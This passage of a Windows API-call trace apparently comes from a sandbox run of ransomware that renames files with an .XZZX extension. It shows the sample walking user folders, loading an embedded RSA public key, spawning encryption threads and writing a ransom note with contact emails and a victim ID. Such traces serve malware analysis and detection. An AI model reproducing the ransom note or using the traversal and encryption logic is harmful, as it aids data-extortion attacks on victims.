(lpFirst="C8D828EF44C6B909469A8E7948E79D51.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0252.292] StrStrW (lpFirst="C8D828EF44C6B909469A8E7948E79D51.XZZX", lpSrch="ntldr") returned 0x0 [0252.292] StrStrW (lpFirst="C8D828EF44C6B909469A8E7948E79D51.XZZX", lpSrch="NTLDR") returned 0x0 [0252.292] StrStrW (lpFirst="C8D828EF44C6B909469A8E7948E79D51.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0252.292] StrStrW (lpFirst="C8D828EF44C6B909469A8E7948E79D51.XZZX", lpSrch="ntdetect.com") returned 0x0 [0252.292] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="Desktop") returned 0x0 [0252.292] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="DESKTOP") returned 0x0 [0252.292] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned 46 [0252.292] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0252.292] lstrcpyW (in: lpString1=0x17cf1c, lpString2="C8D828EF44C6B909469A8E7948E79D51.XZZX" | out: lpString1="C8D828EF44C6B909469A8E7948E79D51.XZZX") returned="C8D828EF44C6B909469A8E7948E79D51.XZZX" [0252.292] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0252.292] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13d8 [0252.293] Sleep (dwMilliseconds=0x96) [0252.445] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0252.445] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0252.445] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0252.445] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0252.445] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0252.445] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0252.445] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0252.445] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games" [0252.445] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*" [0252.445] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="Desktop") returned 0x0 [0252.445] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpSrch="DESKTOP") returned 0x0 [0252.445] SetErrorMode (uMode=0x1) returned 0x1 [0252.445] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\_HELP_INSTRUCTION.TXT") returned 63 [0252.445] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0252.445] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0252.445] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x13dc) returned 0x0 [0252.446] RegQueryValueExW (in: hKey=0x13dc, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43dddf0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43dddf0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0252.446] RegCloseKey (hKey=0x13dc) returned 0x0 [0252.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0252.446] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0252.446] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13dc [0252.446] CloseHandle (hObject=0x13dc) returned 1 [0252.446] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0252.446] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games") returned="Saved Games" [0252.446] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Saved Games" | out: lpString1="Saved Games") returned="Saved Games" [0252.446] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0252.446] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0252.446] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Searches" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0252.446] SetErrorMode (uMode=0x1) returned 0x1 [0252.446] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0252.446] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0252.446] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0252.446] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" [0252.446] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0252.446] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="Searches" [0252.446] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Searches" | out: lpString1="Searches") returned="Searches" [0252.446] StrStrW (lpFirst="07542892440C59CA51177AF248413E12.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0252.446] StrStrW (lpFirst="07542892440C59CA51177AF248413E12.XZZX", lpSrch="ntldr") returned 0x0 [0252.446] StrStrW (lpFirst="07542892440C59CA51177AF248413E12.XZZX", lpSrch="NTLDR") returned 0x0 [0252.446] StrStrW (lpFirst="07542892440C59CA51177AF248413E12.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0252.446] StrStrW (lpFirst="07542892440C59CA51177AF248413E12.XZZX", lpSrch="ntdetect.com") returned 0x0 [0252.446] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="Desktop") returned 0x0 [0252.446] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="DESKTOP") returned 0x0 [0252.446] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 43 [0252.446] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0252.447] lstrcpyW (in: lpString1=0x17cf1c, lpString2="07542892440C59CA51177AF248413E12.XZZX" | out: lpString1="07542892440C59CA51177AF248413E12.XZZX") returned="07542892440C59CA51177AF248413E12.XZZX" [0252.447] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0252.447] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13e4 [0252.447] Sleep (dwMilliseconds=0x96) [0252.600] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0252.600] lstrcmpW (lpString1="22BE9D582E5129D8AA7CE5BC32720E20.XZZX", lpString2="..") returned 1 [0252.600] lstrcmpW (lpString1="22BE9D582E5129D8AA7CE5BC32720E20.XZZX", lpString2=".") returned 1 [0252.600] StrStrW (lpFirst="22BE9D582E5129D8AA7CE5BC32720E20.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0252.600] StrStrW (lpFirst="22BE9D582E5129D8AA7CE5BC32720E20.XZZX", lpSrch="ntldr") returned 0x0 [0252.600] StrStrW (lpFirst="22BE9D582E5129D8AA7CE5BC32720E20.XZZX", lpSrch="NTLDR") returned 0x0 [0252.601] StrStrW (lpFirst="22BE9D582E5129D8AA7CE5BC32720E20.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0252.601] StrStrW (lpFirst="22BE9D582E5129D8AA7CE5BC32720E20.XZZX", lpSrch="ntdetect.com") returned 0x0 [0252.601] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="Desktop") returned 0x0 [0252.601] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="DESKTOP") returned 0x0 [0252.601] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 43 [0252.601] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0252.601] lstrcpyW (in: lpString1=0x17cf1c, lpString2="22BE9D582E5129D8AA7CE5BC32720E20.XZZX" | out: lpString1="22BE9D582E5129D8AA7CE5BC32720E20.XZZX") returned="22BE9D582E5129D8AA7CE5BC32720E20.XZZX" [0252.601] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0252.601] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13e8 [0252.601] Sleep (dwMilliseconds=0x96) [0252.756] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0252.756] lstrcmpW (lpString1="86A958F52BA3FCF7083CB8732FD8E13F.XZZX", lpString2="..") returned 1 [0252.756] lstrcmpW (lpString1="86A958F52BA3FCF7083CB8732FD8E13F.XZZX", lpString2=".") returned 1 [0252.756] StrStrW (lpFirst="86A958F52BA3FCF7083CB8732FD8E13F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0252.756] StrStrW (lpFirst="86A958F52BA3FCF7083CB8732FD8E13F.XZZX", lpSrch="ntldr") returned 0x0 [0252.757] StrStrW (lpFirst="86A958F52BA3FCF7083CB8732FD8E13F.XZZX", lpSrch="NTLDR") returned 0x0 [0252.757] StrStrW (lpFirst="86A958F52BA3FCF7083CB8732FD8E13F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0252.757] StrStrW (lpFirst="86A958F52BA3FCF7083CB8732FD8E13F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0252.757] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="Desktop") returned 0x0 [0252.757] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="DESKTOP") returned 0x0 [0252.757] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned 43 [0252.757] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0252.757] lstrcpyW (in: lpString1=0x17cf1c, lpString2="86A958F52BA3FCF7083CB8732FD8E13F.XZZX" | out: lpString1="86A958F52BA3FCF7083CB8732FD8E13F.XZZX") returned="86A958F52BA3FCF7083CB8732FD8E13F.XZZX" [0252.757] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0252.757] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13ec [0252.757] Sleep (dwMilliseconds=0x96) [0252.913] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0252.913] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0252.913] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0252.913] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0252.913] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0252.913] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 1 [0252.913] FindClose (in: hFindFile=0x3cde9d8 | out: hFindFile=0x3cde9d8) returned 0 [0252.914] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0252.914] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" [0252.914] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="Desktop") returned 0x0 [0252.914] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpSrch="DESKTOP") returned 0x0 [0252.914] SetErrorMode (uMode=0x1) returned 0x1 [0252.914] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\_HELP_INSTRUCTION.TXT") returned 60 [0252.914] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0252.914] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0252.914] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x13f0) returned 0x0 [0252.914] RegQueryValueExW (in: hKey=0x13f0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43de020, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43de020*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0252.914] RegCloseKey (hKey=0x13f0) returned 0x0 [0252.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0252.914] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0252.914] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13f0 [0252.915] CloseHandle (hObject=0x13f0) returned 1 [0252.915] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3cde9d8 [0252.915] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="Searches" [0252.915] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Searches" | out: lpString1="Searches") returned="Searches" [0252.915] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0252.915] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0252.915] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="SendTo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" [0252.915] SetErrorMode (uMode=0x1) returned 0x1 [0252.915] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" [0252.915] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\" [0252.915] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\" [0252.915] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*" [0252.915] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*", 